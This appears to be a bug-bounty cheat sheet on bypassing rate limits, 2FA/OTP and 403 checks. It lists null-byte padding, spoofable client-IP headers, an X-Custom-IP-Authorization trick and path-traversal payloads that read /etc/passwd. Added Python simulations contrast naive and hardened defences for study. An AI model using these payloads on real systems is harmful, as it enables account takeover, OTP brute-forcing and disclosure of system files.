# Rate Limit Bypass / 2FA / OTP Bypass

* <https://medium.com/@huzaifa_tahir/methods-to-bypass-rate-limit-5185e6c67ecd>

{% embed url="<https://twitter.com/harrmahar/status/1247306384128872448>" %}

{% embed url="<https://twitter.com/udit_thakkur/status/1241832273898430464>" %}

* Want to bypass a rate limit? Try appending a null or whitespace payload (%00, %0d%0a, %09, %0C, %20, %0) to the email value. If that does not work, try adding a plain space to the email; a limiter keyed on the raw string treats every variant as a new identifier and hands out a fresh quota.
* <https://shahmeeramir.com/4-methods-to-bypass-two-factor-authentication-2b0075d9eb5f>
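The following is an added example, not code from the page or from either linked post. It simulates an OTP/login rate limiter keyed on the raw email field next to one that canonicalises the identifier first, and shows why each padded variant from the tip above gets its own quota from the naive limiter. The limit of five attempts, the email regex and the sample address are assumptions for the demo; everything runs in-process with no network.

```python
"""Added example (not the page's or any linked post's code): a simulated
OTP/login rate limiter keyed on the raw email field, beside one that
canonicalises the identifier first. It shows why the %00, %0d%0a, %09, %0C,
%20, %0 and trailing-space variants from the tip above each get a fresh
quota from the naive limiter. All requests are simulated in-process."""
import re
from collections import defaultdict
from typing import List, Optional
from urllib.parse import unquote

LIMIT = 5  # attempts per identifier before lockout (assumed policy)

# Suffixes from the tip, as they would be typed into the request body.
# A framework that form-decodes the body turns "%20" into " " before the
# limiter sees it, but the trailing space is still a different string.
BYPASS_SUFFIXES = ["%00", "%0d%0a", "%09", "%0C", "%20", "%0", " "]

# Deliberately simple address shape; enough to reject padded values.
EMAIL_RE = re.compile(r"[a-z0-9._+-]+@[a-z0-9.-]+\.[a-z]{2,}")


def variants(email: str) -> List[str]:
    """Raw values an attacker cycles through for the email field."""
    return [email] + [email + s for s in BYPASS_SUFFIXES]


class NaiveLimiter:
    """Vulnerable: the counter is keyed on the field exactly as received."""

    def __init__(self, limit: int = LIMIT):
        self.limit = limit
        self.hits = defaultdict(int)

    def allow(self, raw_email: str) -> bool:
        self.hits[raw_email] += 1
        return self.hits[raw_email] <= self.limit


def canonical_email(raw: str) -> Optional[str]:
    """Decode once, refuse control characters, trim and lowercase, then
    validate. Returns None for anything that is not a plausible address,
    so padded variants can neither get a quota nor reach the OTP check."""
    decoded = unquote(raw)
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in decoded):
        return None
    decoded = decoded.strip().lower()
    return decoded if EMAIL_RE.fullmatch(decoded) else None


class HardenedLimiter(NaiveLimiter):
    """Keys the counter on the canonical address and rejects malformed input."""

    def allow(self, raw_email: str) -> bool:
        key = canonical_email(raw_email)
        if key is None:
            return False
        return super().allow(key)


def attempts_allowed(limiter: NaiveLimiter, email: str, rounds: int) -> int:
    """Attacker sends every variant `rounds` times; returns how many requests
    the limiter let through to the credential/OTP check."""
    allowed = 0
    for _ in range(rounds):
        for raw in variants(email):
            if limiter.allow(raw):
                allowed += 1
    return allowed


if __name__ == "__main__":
    target = "victim@example.com"  # constructed sample input
    print("naive   :", attempts_allowed(NaiveLimiter(), target, 10))
    print("hardened:", attempts_allowed(HardenedLimiter(), target, 10))
```

With eight variants and a limit of five, the naive limiter lets 40 guesses through over ten rounds while the hardened one stops at five. The fix that matters is keying the counter on the canonical identifier and rejecting control characters outright; in a real service the rejected values are also worth logging, since nobody types %0d%0a into a login form by accident.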

When the limit (or an IP allowlist) is keyed on the client address and the backend reads that address from a request header, set one of these headers to a new IP on each request, or to 127.0.0.1, to get a fresh counter:

```
X-Originating-IP: IP
X-Forwarded-For: IP
X-Remote-IP: IP
X-Remote-Addr: IP
X-Client-IP: IP
X-Host: IP
X-Forwarded-Host: IP
True-Client-IP: IP
X-Real-IP: IP
```

I just happened to be able to bypass a 2FA in place during a recent engagement, and this was how I did it. [#bugbountyTips](https://twitter.com/hashtag/bugbountyTips?src=hashtag_click) [#pentestTips](https://twitter.com/hashtag/pentestTips?src=hashtag_click) The last /setup/ endpoint was as the attacker, while the first one was as the victim. [![Image](https://pbs.twimg.com/media/EWHB2DOUMAAfudW?format=png\&name=medium)](https://twitter.com/imhaxormad/status/1252495614161506309/photo/1)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MFnpthbu_XU6rCBzm_e%2F-MFoFgskwIajJ3zBU0N2%2Fimage.png?alt=media\&token=a6f3972e-1912-435e-ac4f-5b0c95d6bc9b)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MTFqRp-yPp8njZocDEN%2F-MTFx8sSGKlcFTuYwZWq%2Fimage.png?alt=media\&token=ca685644-55b2-44e9-b6b4-2f71b5ee41cb)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MTG0p8wfy7Od-0RQ9Gr%2F-MTG12T92LzRkjHXS98h%2Fimage.png?alt=media\&token=05d05260-c33e-4e42-95bf-68d156f4798c)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEKOIX73MDy6bxkMB1%2F-MWEKRH0xkzO1FhzCDdH%2Fimage.png?alt=media\&token=556bdc88-f609-4eed-9049-9796053c4f64)

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEKtK3XDIKFoKmsd0n%2F-MWEL0XZK12wfReAGrOD%2Fimage.png?alt=media\&token=a0d5b3f5-3f62-4b67-bfa3-fe725df9684e)

{% embed url="<https://twitter.com/harshbothra_/status/1345044218276839424?s=20>" %}

[How to find authentication bypass vulnerabilities. Focus. I added headers. Request: GET /delete?user=test HTTP/1.1. Response: HTTP/1.1 401 Unauthorized. Request: GET /delete?user=test HTTP/1.1 with X-Custom-IP-Authorization: 127.0.0.1. Response: HTTP/1.1 302 Found. #bugbounty #bugbountytips](https://twitter.com/M404ntf/status/1347919441296809984?s=20)

* <https://blog.cobalt.io/bypassing-the-protections-mfa-bypass-techniques-for-the-win-8ef6215de6ab>
* <https://notifybugme.medium.com/unauthorized-access-to-admin-setpassword-page-by-bypass-403-forbidden-f10bbb92ab35>

{% embed url="<https://twitter.com/santosomar/status/1433191775041118208?s=20>" %}

[Every time you face a 401 Unauthorized response, add this header to the request: X-Custom-IP-Authorization: 127.0.0.1 #bugbountytips](https://twitter.com/K0to4m4tsukami/status/1365058637887078406?s=20) / X-Forwarded-Origin: 127.0.0.1
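Both the header list near the top of this page and the two tweets above exploit the same mistake: the backend derives the "client IP" from headers the client itself controls. The block below is an added example, not code from the page or from any of the linked posts. It models a backend that resolves the client address the naive way next to one that only honours X-Forwarded-For hops appended by known proxies, and runs both through an IP-allowlisted `/delete?user=test` check and an IP-keyed rate-limit bucket. The request model, the 10.0.0.0/8 trusted-proxy range, the 127.0.0.1 allowlist and the sample addresses are all assumptions for the demo.

```python
"""Added example (not from the page or any linked post): how client-supplied
IP headers defeat IP-keyed rate limits and IP-based authorization, and how a
resolver that only trusts proxy-appended hops does not. No network is used."""
import ipaddress
from typing import Callable, Dict, List, Optional

# Headers backends and WAFs are known to consult for the "real" client IP:
# the list from this page plus the custom headers from the tweets.
IP_HEADERS: List[str] = [
    "X-Originating-IP", "X-Forwarded-For", "X-Remote-IP", "X-Remote-Addr",
    "X-Client-IP", "X-Host", "True-Client-IP", "X-Real-IP",
    "X-Custom-IP-Authorization", "X-Forwarded-Origin",
]

TRUSTED_PROXIES = ["10.0.0.0/8"]   # assumed: our own reverse proxies
ADMIN_ALLOWLIST = {"127.0.0.1"}    # assumed: the only IP allowed to /delete


class Request:
    """Minimal request model: the TCP peer address plus request headers."""

    def __init__(self, peer: str, headers: Optional[Dict[str, str]] = None):
        self.peer = peer  # source address of the TCP connection, not spoofable
        self.headers = {k.lower(): v for k, v in (headers or {}).items()}

    def get(self, name: str) -> Optional[str]:
        return self.headers.get(name.lower())


def spoof_headers(ip: str) -> Dict[str, str]:
    """Attacker's request: every candidate header claims `ip`."""
    return {h: ip for h in IP_HEADERS}


def client_ip_naive(req: Request) -> str:
    """Vulnerable: the first header present wins, whoever sent it, and the
    leftmost X-Forwarded-For entry (the one the client writes) is taken."""
    for h in IP_HEADERS:
        value = req.get(h)
        if value:
            return value.split(",")[0].strip()
    return req.peer


def client_ip_hardened(req: Request, trusted_proxies: List[str]) -> str:
    """Only look at X-Forwarded-For when the TCP peer is one of our proxies,
    and walk the chain right-to-left past trusted hops: the rightmost
    untrusted entry is the address the proxy itself saw."""
    nets = [ipaddress.ip_network(n) for n in trusted_proxies]

    def trusted(ip: str) -> bool:
        try:
            return any(ipaddress.ip_address(ip) in n for n in nets)
        except ValueError:
            return False  # garbage in the chain is never a trusted hop

    if not trusted(req.peer):
        return req.peer  # direct connection: every IP header is attacker data
    hops = [h.strip() for h in (req.get("X-Forwarded-For") or "").split(",") if h.strip()]
    for hop in reversed(hops):
        if not trusted(hop):
            return hop
    return req.peer  # chain held only our proxies; nothing client-supplied


def hardened_resolver(req: Request) -> str:
    return client_ip_hardened(req, TRUSTED_PROXIES)


def delete_user_status(req: Request, resolver: Callable[[Request], str]) -> int:
    """Models the tweet's GET /delete?user=test: 302 when the resolved IP is
    allowlisted, 401 otherwise."""
    return 302 if resolver(req) in ADMIN_ALLOWLIST else 401


def distinct_rate_limit_keys(resolver: Callable[[Request], str],
                             attacker_peer: str, n: int) -> int:
    """Attacker sends n requests from one address, each claiming a different
    IP in every header; returns how many rate-limit buckets that yields."""
    keys = {resolver(Request(attacker_peer, spoof_headers(f"198.51.100.{i}")))
            for i in range(n)}
    return len(keys)


if __name__ == "__main__":
    direct = Request("203.0.113.7", spoof_headers("127.0.0.1"))  # constructed
    print("naive   :", delete_user_status(direct, client_ip_naive),
          distinct_rate_limit_keys(client_ip_naive, "203.0.113.7", 20))
    print("hardened:", delete_user_status(direct, hardened_resolver),
          distinct_rate_limit_keys(hardened_resolver, "203.0.113.7", 20))
```

Against the naive resolver the spoofed request is authorized (302) and twenty requests land in twenty separate buckets; the hardened resolver ignores every header on a direct connection, returns 401, and keeps all twenty in one bucket. When the request does arrive via a trusted proxy, the attacker can still prepend `127.0.0.1` to X-Forwarded-For, which is exactly why the hardened version reads the chain from the right rather than the left.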

Bug bounty technique: `GET /page.php?path=../../etc/passwd` returns 403 Forbidden? Try one of these:

```
(1) ../../../etc/passwd%00
(2) ....//....//....//etc/passwd
(3) %252e%252e%252fetc%252fpasswd
```

(1) relies on null-byte truncation: a suffix the application appends (typically an extension) is checked on the string but dropped when the file is opened. (2) defeats a filter that removes `../` in a single pass, since `....//` becomes `../` after one removal. (3) is double URL encoding: the server decodes once, the filter sees `%2e%2e%2f`, and a later decode turns it back into `../`. Adjust the number of `../` levels to the depth of the document root.
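To see which server-side weakness each of the three variants actually needs, here is an added example, not code from the tweet or the page: three toy guards, each carrying one of the flaws above, and a hardened resolver that rejects all three payloads. The document root `/var/www/files`, the appended `.txt` suffix and the sample requests are invented for the demo, and nothing touches the real filesystem; the resolved path is returned instead of opened. Variant (3) is generalised to any traversal depth, of which the page's string is the depth-1 case.

```python
"""Added example (not from the page or the tweet): three weak path guards,
one per bypass variant, and a hardened resolver. Paths are computed with
posixpath and never opened, so this runs anywhere."""
import posixpath
from typing import Callable, Optional
from urllib.parse import unquote

DOCROOT = "/var/www/files"  # assumed document root


def c_string(s: str) -> str:
    """What a C-level open() sees: the name ends at the first NUL byte."""
    return s.split("\x00", 1)[0]


def double_encoded(depth: int) -> str:
    """Variant (3) generalised: '../' repeated `depth` times, every byte
    URL-encoded twice. depth=1 is exactly the string on the page."""
    return "%252e%252e%252f" * depth + "etc%252fpasswd"


# Each guard takes the parameter after the web server's single URL decode
# and returns the path it would open, or None for a 403.

def guard_extension(p: str) -> Optional[str]:
    """Forces a .txt suffix and checks it on the Python string; the NUL in
    variant (1) makes open() drop the suffix (and nothing checks the prefix)."""
    full = f"{DOCROOT}/{p}.txt"
    if not full.endswith(".txt"):
        return None
    return posixpath.normpath(c_string(full))


def guard_strip_once(p: str) -> Optional[str]:
    """Removes '../' in a single pass and serves the remainder; '....//'
    collapses to '../' after the strip, which is variant (2)."""
    return posixpath.normpath(posixpath.join(DOCROOT, p.replace("../", "")))


def guard_check_then_decode(p: str) -> Optional[str]:
    """Blocks '../' in the once-decoded value, then a legacy component
    decodes the value a second time before use, which is variant (3)."""
    if "../" in p or p.startswith("/"):
        return None
    return posixpath.normpath(posixpath.join(DOCROOT, unquote(p)))


def guard_hardened(p: str) -> Optional[str]:
    """Decode exactly once (done by the caller), refuse NUL, resolve to an
    absolute path and require it to stay inside DOCROOT. Real code would
    also realpath() the result to defeat symlinks."""
    if "\x00" in p:
        return None
    full = posixpath.normpath(posixpath.join(DOCROOT, p))
    if not full.startswith(DOCROOT + "/"):
        return None
    return full


def serve(raw: str, guard: Callable[[str], Optional[str]]) -> Optional[str]:
    """Simulates one request: the web server URL-decodes the parameter once,
    then the guard decides what (if anything) gets opened."""
    return guard(unquote(raw))


if __name__ == "__main__":
    payloads = ["../../etc/passwd", "../../../etc/passwd%00",
                "....//....//....//etc/passwd", double_encoded(3)]  # constructed
    for guard in (guard_extension, guard_strip_once,
                  guard_check_then_decode, guard_hardened):
        print(guard.__name__, [serve(p, guard) for p in payloads])
```

Each weak guard stops the plain payload (with a 403 or by serving a harmless wrong file) yet opens `/etc/passwd` for its matching variant, while the hardened guard either returns None or a path still under `/var/www/files` for all four. Note that the double-encoded payload needs as many `../` as the document root is deep; the page's depth-1 string resolves to `/var/www/etc/passwd` against this layout.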

{% embed url="<https://twitter.com/FaniMalikHack/status/1395042756108505092?s=20>" %}

2FA - <https://mazoka777.medium.com/two-factor-authentication-bypass-4c814627f8c3>

{% embed url="<https://github.com/aufzayed/bugbounty/tree/main/403-bypass>" %}
